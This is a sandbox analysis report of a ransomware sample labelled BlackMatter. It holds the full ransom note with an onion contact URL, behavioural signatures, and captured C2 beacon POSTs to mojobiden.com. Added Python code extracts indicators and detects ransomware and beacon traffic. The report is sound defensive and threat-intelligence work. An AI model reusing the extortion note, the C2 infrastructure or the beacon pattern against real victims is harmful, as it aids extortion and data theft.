Analysis

  • max time kernel
    137s
  • max time network
    154s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    01/08/2021, 19:34 UTC

General

  • Target

    sample.exe

  • Size

    67KB

  • MD5

    598c53bfef81e489375f09792e487f1a

  • SHA1

    80a29bd2c349a8588edf42653ed739054f9a10f5

  • SHA256

    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6

  • SHA512

    6a82ad5009588d2fa343bef8d9d2a02e2e76eec14979487a929a96a6b6965e82265a69ef8dd29a01927e9713468de3aedd7b5ee5e79839a1a50649855a160c35

Score
10/10

Malware Config

Extracted

Path

C:\oSPvdHTvI.README.txt

Ransom Note
~+ * + ' BLACK | () .-.,='``'=. - o - '=/_ \ | * | '=._ | \ `=./`, ' . '=.__.=' `=' * + Matter + O * ' . 

>>> What happens?
Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver. We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.

>>> What guarantees?
We are not a politically motivated group and we do not need anything other than your money. If you pay, we will provide you the programs for decryption and we will delete your data. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. We always keep our promises.

>> Data leak includes
1. Full emloyeers personal data
2. Network information
3. Schemes of buildings, active project information, architect details and contracts,
4. Finance info

>>> How to contact with us?
1. Download and install TOR Browser (https://www.torproject.org/).
2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV.

>>> Warning! Recovery recommendations.
We strongly recommend you to do not MODIFY or REPAIR your files, that will damage them.
URLs

http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV
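
The report's "Malware Config / Extracted" block is the product of exactly this kind of parsing. The following is an added example, not the sandbox's extractor or the sample's own code: it pulls every URL out of the note text above, validates that the contact address is a well-formed v3 onion (56 base32 characters decoding to pubkey || checksum || version, with version 3 and checksum = SHA3-256(".onion checksum" || pubkey || version)[:2], per the Tor rendezvous specification), and records the size the note claims was exfiltrated. Treating the path segment after the onion host as a per-victim token is the author's assumption; the page only shows the URL.

```python
"""Extract the contact URL and path token from the ransom note in this report.

Added example, not the sandbox's own config extractor or the sample's code.
NOTE is the relevant part of the note text from the report. The v3 .onion
check follows the Tor rendezvous spec; calling the path a per-victim token is
the author's assumption.
"""
import base64
import binascii
import hashlib
import re

NOTE = (
    ">>> What happens? Your network is encrypted, and currently not operational. "
    "We have downloaded 1TB from your fileserver. We need only money, after payment "
    "we will give you a decryptor for the entire network and you will restore all the data. "
    ">>> How to contact with us? 1. Download and install TOR Browser (https://www.torproject.org/). "
    "2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV. "
    ">>> Warning! Recovery recommendations. We strongly recommend you to do not MODIFY "
    "or REPAIR your files, that will damage them."
)

_URL = re.compile(r"https?://[^\s)\]>\"']+", re.ASCII)
_ONION = re.compile(r"^https?://([a-z2-7]+)\.onion(?:/([A-Za-z0-9]+))?", re.ASCII)


def is_v3_onion(label):
    """True if label is a well-formed v3 onion address: 56 base32 chars that decode
    to pubkey[32] || checksum[2] || version[1], version 3, checksum verified."""
    if len(label) != 56:
        return False
    try:
        raw = base64.b32decode(label.upper())
    except (binascii.Error, ValueError):
        return False
    pubkey, checksum, version = raw[:32], raw[32:34], raw[34]
    if version != 3:
        return False
    expect = hashlib.sha3_256(b".onion checksum" + pubkey + bytes([version])).digest()[:2]
    return checksum == expect


def extract_config(note):
    """Return the URLs in the note, the first onion contact (with host, path token
    and v3 validity) and the exfiltration size the note claims."""
    urls = [u.rstrip(".,;") for u in _URL.findall(note)]   # drop sentence punctuation
    onion = None
    for u in urls:
        m = _ONION.match(u)
        if m:
            onion = {"url": u, "host": m.group(1) + ".onion",
                     "path_token": m.group(2), "v3_valid": is_v3_onion(m.group(1))}
            break
    size = re.search(r"downloaded\s+(\d+\s*[KMGT]B)", note, re.IGNORECASE)
    return {"urls": urls, "onion": onion, "claimed_exfil": size.group(1) if size else None}
```

A failed `v3_valid` on a note is worth noticing in its own right: it usually means the note was transcribed or OCR'd with an error and the indicator should not be blocked or pivoted on as-is.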

Signatures

  • Modifies extensions of user files (19 IoCs)

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives (3 TTPs, 1 IoC)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry (2 TTPs, 2 IoCs)
  • Suspicious use of NtSetInformationThreadHideFromDebugger (6 IoCs)

    Calling NtSetInformationThread with the ThreadHideFromDebugger information class stops the thread from delivering debug events, a common anti-analysis step.

  • Modifies Control Panel (3 IoCs)
  • Opens file in notepad (likely ransom note) (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (4 IoCs)
  • Suspicious use of AdjustPrivilegeToken (17 IoCs)

    The process enables privileges in its own access token; the same signature fires on vssvc.exe in the process list below.
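
The first two signatures above, plus the note drop visible in the process list, are simple enough to replay over a file-system event stream. The block below is an added example and not the sandbox's rule logic: EVENTS is a constructed stream modelled on this run (PID 1696 renaming files under the user profile, reading the roots of drives other than C:, and creating `<id>.README.txt` notes in C:\ and in the user's Documents folder). The appended `.oSPvdHTvI` extension, the second "benign" process, the rename threshold and the `C:\Users\` prefix are all assumptions.

```python
"""Replay of three of the report's behavioural signatures over file-system events.

Added example, not the sandbox's own rule logic. EVENTS is constructed and
modelled on this run; the appended extension, the second process, the rename
threshold and the user-profile prefix are assumptions.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

USER_PROFILE_PREFIX = "C:\\Users\\"                                   # "user files" live here (assumption)
NOTE_NAME = re.compile(r"^[A-Za-z0-9]{9}\.README\.txt$", re.ASCII)   # matches oSPvdHTvI.README.txt

_DOCS = [("budget", "xlsx"), ("thesis", "docx"), ("family", "jpg"),
         ("vault", "kdbx"), ("notes", "txt"), ("q3", "pptx")]
EVENTS = [  # (pid, operation, path, new_path); constructed, the ".oSPvdHTvI" suffix is made up
    (1696, "rename", f"C:\\Users\\Admin\\Documents\\{n}.{e}",
     f"C:\\Users\\Admin\\Documents\\{n}.{e}.oSPvdHTvI") for n, e in _DOCS
] + [
    (1696, "read_dir", "D:\\", None),
    (1696, "read_dir", "E:\\", None),
    (1696, "read_dir", "C:\\Users\\Admin\\Documents", None),
    (1696, "create", "C:\\oSPvdHTvI.README.txt", None),
    (1696, "create", "C:\\Users\\Admin\\Documents\\oSPvdHTvI.README.txt", None),
    # a benign installer: one rename, no drive roots, no note
    (4120, "rename", "C:\\Users\\Admin\\Downloads\\report.tmp",
     "C:\\Users\\Admin\\Downloads\\report.pdf"),
    (4120, "read_dir", "C:\\Users\\Admin\\Downloads", None),
]


def changed_extension(old, new):
    """True when a rename changes the file's final extension."""
    return PureWindowsPath(old).suffix.lower() != PureWindowsPath(new).suffix.lower()


def is_drive_root(path, exclude=("C:",)):
    """True for paths such as D:\\ that are the root of a drive not in `exclude`."""
    p = PureWindowsPath(path)
    return bool(p.drive) and p.parent == p and p.drive.upper() not in exclude


def detect(events, rename_threshold=5):
    """Return {pid: findings} for 'modifies extensions of user files',
    'enumerates connected drives' and 'drops ransom note'."""
    renames = defaultdict(int)
    drive_roots = defaultdict(set)
    notes = defaultdict(list)
    for pid, op, path, new_path in events:
        if (op == "rename" and path.lower().startswith(USER_PROFILE_PREFIX.lower())
                and changed_extension(path, new_path)):
            renames[pid] += 1
        elif op == "read_dir" and is_drive_root(path):
            drive_roots[pid].add(PureWindowsPath(path).drive.upper())
        elif op == "create" and NOTE_NAME.match(PureWindowsPath(path).name):
            notes[pid].append(path)
    findings = {}
    for pid in set(renames) | set(drive_roots) | set(notes):
        f = {}
        if renames[pid] >= rename_threshold:          # one or two renames are normal
            f["modifies_user_file_extensions"] = renames[pid]
        if drive_roots[pid]:
            f["enumerates_drives"] = sorted(drive_roots[pid])
        if notes[pid]:
            f["ransom_notes"] = notes[pid]
        if f:
            findings[pid] = f
    return findings
```

The threshold matters: a single extension change is what installers and editors do all day, so the rule counts per process and only fires on volume, while a drive-root read or a note-shaped filename is reported on first sight.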

Processes

  • C:\Users\Admin\AppData\Local\Temp\sample.exe (PID 1696)
    "C:\Users\Admin\AppData\Local\Temp\sample.exe"
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies Control Panel
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
  • C:\Windows\system32\vssvc.exe (PID 3764; the Volume Shadow Copy service)
    C:\Windows\system32\vssvc.exe
    • Suspicious use of AdjustPrivilegeToken
  • C:\Windows\System32\rundll32.exe (PID 2604)
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    • C:\Windows\system32\NOTEPAD.EXE (PID 2704)
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Documents\oSPvdHTvI.README.txt
      • Opens file in notepad (likely ransom note)

Network

    • DNS
      paymenthacks.com
      sample.exe
      Remote address:
      8.8.8.8:53
      Request
      paymenthacks.com
      IN A
      Response
      paymenthacks.com
      IN A
      206.188.197.206
    • DNS
      mojobiden.com
      sample.exe
      Remote address:
      8.8.8.8:53
      Request
      mojobiden.com
      IN A
      Response
      mojobiden.com
      IN A
      51.79.243.236
    • POST
      https://mojobiden.com/?Vqc=OMZzYTRcJ&l8uTU=33SN&EBLCajg=roMFpojHIg3K&jGGPtG=5Cgf4Y5LURVia76iJ&AlrG=bCRhsyDaQlBUTBm&zYh76=daQRh0zh&5sqNK=XoTFM6HgEhR8zlY&toytECZ=ixlaTpcYVc2bbQR9Iu&Q4dOAzP=1liI1Es3cIf101
      sample.exe
      Remote address:
      51.79.243.236:443
      Request
      POST /?Vqc=OMZzYTRcJ&l8uTU=33SN&EBLCajg=roMFpojHIg3K&jGGPtG=5Cgf4Y5LURVia76iJ&AlrG=bCRhsyDaQlBUTBm&zYh76=daQRh0zh&5sqNK=XoTFM6HgEhR8zlY&toytECZ=ixlaTpcYVc2bbQR9Iu&Q4dOAzP=1liI1Es3cIf101 HTTP/1.1
      Accept: */*
      Connection: keep-alive
      Accept-Encoding: gzip, deflate, br
      Content-Type: text/plain
      User-Agent: AppleWebKit/587.38 (KHTML, like Gecko)
      Host: mojobiden.com
      Content-Length: 634
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Sun, 01 Aug 2021 19:36:02 GMT
      Content-Type: application/json; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
    • DNS
      x1.c.lencr.org
      sample.exe
      Remote address:
      8.8.8.8:53
      Request
      x1.c.lencr.org
      IN A
      Response
      x1.c.lencr.org
      IN CNAME
      crl.root-x1.letsencrypt.org.edgekey.net
      crl.root-x1.letsencrypt.org.edgekey.net
      IN CNAME
      e8652.dscx.akamaiedge.net
      e8652.dscx.akamaiedge.net
      IN A
      104.73.61.97
    • GET
      http://x1.c.lencr.org/
      sample.exe
      Remote address:
      104.73.61.97:80
      Request
      GET / HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: x1.c.lencr.org
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Content-Type: application/pkix-crl
      Last-Modified: Mon, 26 Jul 2021 16:20:55 GMT
      ETag: "60fee0e7-2cd"
      Cache-Control: max-age=3600
      Expires: Sun, 01 Aug 2021 20:36:00 GMT
      Date: Sun, 01 Aug 2021 19:36:00 GMT
      Content-Length: 717
      Connection: keep-alive
    • POST
      https://mojobiden.com/?TDaznECZ=lFe5VY49wsXC&FCUZPGz54=rKy&g6v=UtDO&8Ab1mzraO=im1zadJOkXvCMVdoS&E6RXI=F3YJrQMbEoxxywX0KF
      sample.exe
      Remote address:
      51.79.243.236:443
      Request
      POST /?TDaznECZ=lFe5VY49wsXC&FCUZPGz54=rKy&g6v=UtDO&8Ab1mzraO=im1zadJOkXvCMVdoS&E6RXI=F3YJrQMbEoxxywX0KF HTTP/1.1
      Accept: */*
      Connection: keep-alive
      Accept-Encoding: gzip, deflate, br
      Content-Type: text/plain
      User-Agent: Edge/91.0.864.37
      Host: mojobiden.com
      Content-Length: 576
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Sun, 01 Aug 2021 19:36:47 GMT
      Content-Type: application/json; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
    Connections (destination; host or URL; protocol; process; bytes sent; bytes received; packets sent; packets received)

    • 206.188.197.206:443; paymenthacks.com; -; sample.exe; 156 B; -; 3; -
    • 206.188.197.206:80; paymenthacks.com; -; sample.exe; 156 B; -; 3; -
    • 51.79.243.236:443; https://mojobiden.com/?Vqc=OMZzYTRcJ&l8uTU=33SN&EBLCajg=roMFpojHIg3K&jGGPtG=5Cgf4Y5LURVia76iJ&AlrG=bCRhsyDaQlBUTBm&zYh76=daQRh0zh&5sqNK=XoTFM6HgEhR8zlY&toytECZ=ixlaTpcYVc2bbQR9Iu&Q4dOAzP=1liI1Es3cIf101; tls, http; sample.exe; 2.0kB; 5.1kB; 13; 9
      HTTP: POST, response 200
    • 104.73.61.97:80; http://x1.c.lencr.org/; http; sample.exe; 345 B; 1.1kB; 5; 3
      HTTP: GET, response 200
    • 206.188.197.206:443; paymenthacks.com; -; sample.exe; 156 B; -; 3; -
    • 206.188.197.206:80; paymenthacks.com; -; sample.exe; 156 B; -; 3; -
    • 51.79.243.236:443; https://mojobiden.com/?TDaznECZ=lFe5VY49wsXC&FCUZPGz54=rKy&g6v=UtDO&8Ab1mzraO=im1zadJOkXvCMVdoS&E6RXI=F3YJrQMbEoxxywX0KF; tls, http; sample.exe; 1.5kB; 648 B; 8; 5
      HTTP: POST, response 200
    • 8.8.8.8:53; paymenthacks.com; dns; sample.exe; 62 B; 78 B; 1; 1
      DNS: paymenthacks.com, response 206.188.197.206
    • 8.8.8.8:53; mojobiden.com; dns; sample.exe; 59 B; 75 B; 1; 1
      DNS: mojobiden.com, response 51.79.243.236
    • 8.8.8.8:53; x1.c.lencr.org; dns; sample.exe; 60 B; 165 B; 1; 1
      DNS: x1.c.lencr.org, response 104.73.61.97

    The column order is inferred from the DNS rows, where 62 B / 78 B / 1 / 1 is one query and one reply. The four rows for 206.188.197.206 carry only a sent-side count (156 B in 3 packets, about 52 B each, the size of an IPv4 header plus a TCP SYN with options) and no received bytes, which is consistent with unanswered connection attempts: paymenthacks.com resolved but did not answer on 443 or 80 during this run, and every completed exchange went to mojobiden.com. The x1.c.lencr.org fetch is Windows CryptoAPI (User-Agent Microsoft-CryptoAPI/10.0) retrieving the Let's Encrypt root CRL while validating the mojobiden.com certificate, not traffic generated by the sample's own code.

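The two POSTs to mojobiden.com share a shape that is easy to pick out of proxy logs: a POST to the site root whose query string is nothing but opaque key=value pairs, a text/plain body, and a User-Agent that is only a fragment of a browser string (AppleWebKit/587.38 (KHTML, like Gecko) on the first request, Edge/91.0.864.37 on the second, both from the same sample.exe). The block below is an added example and not part of the report or the sample: it parses the two request heads as captured above (headers the heuristics do not read are omitted), scores them against those indicators, and flags a process that rotates User-Agents. The benign control requests are constructed, and the indicators are the author's heuristics rather than vendor signatures.

```python
"""Triage of the two C2 POSTs captured in this report against beacon heuristics.

Added example, not part of the sandbox report or of the sample. REPORT_POST_1
and REPORT_POST_2 are the request heads from the report (unread headers
omitted); BENIGN_* are constructed controls. The indicators are the author's
heuristics, not vendor signatures.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qsl, urlsplit

REPORT_POST_1 = """POST /?Vqc=OMZzYTRcJ&l8uTU=33SN&EBLCajg=roMFpojHIg3K&jGGPtG=5Cgf4Y5LURVia76iJ&AlrG=bCRhsyDaQlBUTBm&zYh76=daQRh0zh&5sqNK=XoTFM6HgEhR8zlY&toytECZ=ixlaTpcYVc2bbQR9Iu&Q4dOAzP=1liI1Es3cIf101 HTTP/1.1
Content-Type: text/plain
User-Agent: AppleWebKit/587.38 (KHTML, like Gecko)
Host: mojobiden.com
Content-Length: 634"""

REPORT_POST_2 = """POST /?TDaznECZ=lFe5VY49wsXC&FCUZPGz54=rKy&g6v=UtDO&8Ab1mzraO=im1zadJOkXvCMVdoS&E6RXI=F3YJrQMbEoxxywX0KF HTTP/1.1
Content-Type: text/plain
User-Agent: Edge/91.0.864.37
Host: mojobiden.com
Content-Length: 576"""

# Constructed controls: an ordinary browser search and a form login.
BENIGN_GET = """GET /search?q=shadow+copies&hl=en HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"""

BENIGN_POST = """POST /login HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Content-Length: 29"""


@dataclass
class HttpRequest:
    process: str
    method: str
    target: str                                   # request-target from the request line
    headers: dict = field(default_factory=dict)   # header names lower-cased


def parse_request(process, raw):
    """Parse a raw request head (request line plus headers) into an HttpRequest."""
    lines = [ln for ln in raw.strip().splitlines() if ln.strip()]
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(process, method, target, headers)


_BROWSER_UA = re.compile(r"^Mozilla/\d", re.ASCII)           # real browser UAs start this way
_RANDOM_TOKEN = re.compile(r"^[A-Za-z0-9]{3,}$", re.ASCII)   # opaque alphanumeric blob


def beacon_indicators(req):
    """Return the names of the heuristics that fire for one request."""
    hits = []
    parts = urlsplit(req.target)
    params = parse_qsl(parts.query, keep_blank_values=True)
    # POST to the site root where every key and value is an opaque alphanumeric token
    if (req.method == "POST" and parts.path in ("", "/") and len(params) >= 3
            and all(_RANDOM_TOKEN.match(k) and _RANDOM_TOKEN.match(v) for k, v in params)):
        hits.append("post-root-random-query")
    # Browsers post forms, multipart or JSON; a text/plain body is unusual
    if req.method == "POST" and req.headers.get("content-type", "").startswith("text/plain"):
        hits.append("textplain-post")
    # A User-Agent that is only a fragment of a browser string
    ua = req.headers.get("user-agent", "")
    if ua and not _BROWSER_UA.match(ua):
        hits.append("fragment-user-agent")
    return hits


def triage(requests, min_hits=2):
    """Map request-target -> indicators for requests scoring >= min_hits, adding
    'ua-rotation' when the owning process sent more than one User-Agent."""
    ua_by_process = {}
    flagged = {}
    for req in requests:
        ua_by_process.setdefault(req.process, set()).add(req.headers.get("user-agent", ""))
        hits = beacon_indicators(req)
        if len(hits) >= min_hits:
            flagged[req.target] = (req.process, hits)
    rotating = {p for p, uas in ua_by_process.items() if len(uas) > 1}
    for proc, hits in flagged.values():
        if proc in rotating:
            hits.append("ua-rotation")
    return {target: hits for target, (_p, hits) in flagged.items()}


def run_triage():
    """Run the heuristics over the two captured POSTs and the two constructed controls."""
    return triage([
        parse_request("sample.exe", REPORT_POST_1),
        parse_request("sample.exe", REPORT_POST_2),
        parse_request("chrome.exe", BENIGN_GET),
        parse_request("chrome.exe", BENIGN_POST),
    ])
```

Each indicator on its own is noisy (plenty of legitimate clients send odd User-Agents), which is why the score requires two of them before a request is reported; the User-Agent rotation is then attached as corroboration rather than used as a trigger.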
MITRE ATT&CK Enterprise v6


Downloads

  • memory/1696-114-0x0000000002993000-0x0000000002995000-memory.dmp (8KB)
  • memory/1696-115-0x0000000002990000-0x0000000002991000-memory.dmp (4KB)
